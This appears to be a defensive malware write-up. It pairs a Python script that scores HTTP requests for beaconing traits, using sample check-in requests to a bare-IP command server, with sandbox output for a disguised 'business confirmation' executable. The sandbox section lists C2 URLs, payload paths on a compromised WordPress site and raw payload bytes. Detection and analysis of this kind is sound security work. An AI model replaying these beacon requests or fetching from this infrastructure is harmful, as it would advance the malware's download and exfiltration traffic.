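    "Cache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\n"
    "Host: 45.139.236.6\r\n\r\n",
    "POST / HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n"
    "Pragma: no-cache\r\n"
    "Content-Type: multipart/form-data, boundary=fQ2iY0qI4sL4iB1dG6aM1wQ5vV6a\r\n"
    "Content-Length: 1401\r\nHost: 45.139.236.6\r\n\r\n",
]
# Constructed benign control: an ordinary browser request.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Accept: text/html\r\nConnection: keep-alive\r\n\r\n"
)


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.1 request head into (method, target, lowercase-keyed headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def is_literal_ip(host: str) -> bool:
    """True when the Host header carries an IP literal (optionally with a port) rather than a name."""
    candidate = host.split("]")[0].lstrip("[") if host.startswith("[") else host.split(":")[0]
    try:
        ipaddress.ip_address(candidate)
        return True
    except ValueError:
        return False


def score_request(raw: str) -> Tuple[int, List[str]]:
    """Return (score, reasons). Each trait is weak on its own; the combination is the signal."""
    method, target, h = parse_request(raw)
    reasons: List[str] = []
    if "user-agent" not in h:
        reasons.append("no User-Agent header")
    host = h.get("host", "")
    if is_literal_ip(host):
        reasons.append(f"Host is an IP literal ({host}); no DNS resolution needed")
    if target.startswith("//"):
        reasons.append("request target starts with '//' (base URL joined carelessly)")
    if (h.get("cache-control", "").lower() == "no-cache"
            and h.get("pragma", "").lower() == "no-cache"
            and "accept" not in h):
        reasons.append("Cache-Control/Pragma no-cache pair with no Accept header (programmatic client)")
    ctype = h.get("content-type", "")
    if method == "POST" and ctype.startswith("multipart/form-data,"):
        reasons.append("multipart Content-Type separates the boundary with ',' instead of ';'")
    length = h.get("content-length", "")
    if method == "POST" and ctype.startswith("text/plain") and length.isdigit() and int(length) <= 256:
        reasons.append(f"small text/plain POST ({length} bytes): check-in sized")
    return len(reasons), reasons


def flag_beacons(requests: List[str], threshold: int = 3) -> List[Tuple[int, List[str]]]:
    """Keep only requests that accumulate at least `threshold` traits."""
    return [(s, r) for s, r in map(score_request, requests) if s >= threshold]
```

Run this over proxy or IDS HTTP logs rather than packet captures when possible: the traits it needs (request line, Host, User-Agent, Content-Type, Content-Length) are all present in standard proxy logging, and the 128-byte text/plain POST to a bare IP is the cheapest of them to hunt for on its own.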
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.201.225.248 195.201.225.248
Source: Joe Sandbox View IP Address: 45.139.236.6 45.139.236.6
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.236.6 (50 connections, all to this address)
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 30 Mar 2021 12:22:51 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Thu, 11 Feb 2021 18:55:16 GMTETag: "60257d94-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc 
ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837471226.00000000009E7000.00000004.00000001.sdmp String found in binary or memory: rence":"http://support.apple.com/kb/HT203092","status":"requires_authorization","version":"7.7.6"}]},"chromium-pdf":{"group_name_matcher":"*Chromium PDF Viewer*","mime_types":[],"name":"Chromium PDF Viewer","versions":[{"comment":"Chromium PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"chromium-pdf-plugin":{"group_name_matcher":"*Chromium PDF Plugin*","mime_types":[],"name":"Chromium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google 
Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","applicati
Source: unknown DNS traffic detected: queries for: ekocafebali.com
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp String found in binary or memory: http://45.139.236.6
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe String found in binary or memory: http://45.139.236.6/
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp String found in binary or memory: http://45.139.236.6//l/f/7y4Wg3gBuI_ccNKoGwkK/0a3546e5040ab5a4b3cac44b064a321d51adba4a
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp String found in binary or memory: http://45.139.236.6//l/f/7y4Wg3gBuI_ccNKoGwkK/7a6d75ef6f646f4419fc28f58e62a7952e597921
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp String found in binary or memory: http://45.139.236.6//l/f/7y4Wg3gBuI_ccNKoGwkK/7a6d75ef6f646f4419fc28f58e62a7952e597921er
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp String found in binary or memory: http://45.139.236.6/E
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839118709.0000000000A12000.00000004.00000001.sdmp String found in binary or memory: http://45.139.236.6/OINT
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.830914273.00000000009F9000.00000004.00000001.sdmp String found in binary or memory: http://45.139.236.6/q_
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp String found in binary or memory: http://45.139.236.6ne
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.830914273.00000000009F9000.00000004.00000001.sdmp String found in binary or memory: http://apps.identrust.com/roots/dst
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nssckbi.dll.4.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.4.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.830914273.00000000009F9000.00000004.00000001.sdmp String found in binary or memory: http://cps.letseh
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: http://cps.letsencrypt.org0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: nssckbi.dll.4.dr String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.4.dr String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837471226.00000000009E7000.00000004.00000001.sdmp String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: nssckbi.dll.4.dr String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://ocsp.accv.es0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.4.dr String found in binary or memory: http://policy.camerfirma.com0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp String found in binary or memory: http://r3.i.lencr.org/0-
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: http://r3.i.lencr.org/0Y
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: nssckbi.dll.4.dr String found in binary or memory: http://repository.swisssign.com/0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837471226.00000000009E7000.00000004.00000001.sdmp String found in binary or memory: http://support.apple.com/kb/HT203092
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.accv.es00
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: mozglue.dll.4.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr String found in binary or memory: http://www.mozilla.com0
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: sqlite3.dll.4.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: nssckbi.dll.4.dr String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
Source: RYwTiizs2t.4.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
Source: RYwTiizs2t.4.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839128579.0000000000A18000.00000004.00000001.sdmp String found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.846081146.00000000009EC000.00000004.00000001.sdmp, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp String found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe String found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp String found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591LMEM
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.846017240.0000000000A22000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1xdLMEM
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839118709.0000000000A12000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.846017240.0000000000A22000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1e-LMEM
Source: RYwTiizs2t.4.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RYwTiizs2t.4.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RYwTiizs2t.4.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849718672.0000000000561000.00000040.00000001.sdmp String found in binary or memory: https://ekocafebali.com/wp-content/plugins/vmaxyvefms/back/78893c675eddafbfbda146801a998645182ce2c3_
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849718672.0000000000561000.00000040.00000001.sdmp String found in binary or memory: https://ekocafebali.com/wp-content/plugins/vmaxyvefms/main/78893c675eddafbfbda146801a998645182ce2c3_
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839118709.0000000000A12000.00000004.00000001.sdmp String found in binary or memory: https://helpx.a
Source: nssckbi.dll.4.dr String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.4.dr String found in binary or memory: https://repository.luxtrust.lu0
Source: RYwTiizs2t.4.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: RYwTiizs2t.4.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839118709.0000000000A12000.00000004.00000001.sdmp String found in binary or memory: https://support.google.c
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837471226.00000000009E7000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837414207.0000000000A22000.00000004.00000001.sdmp, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837391480.0000000000A12000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
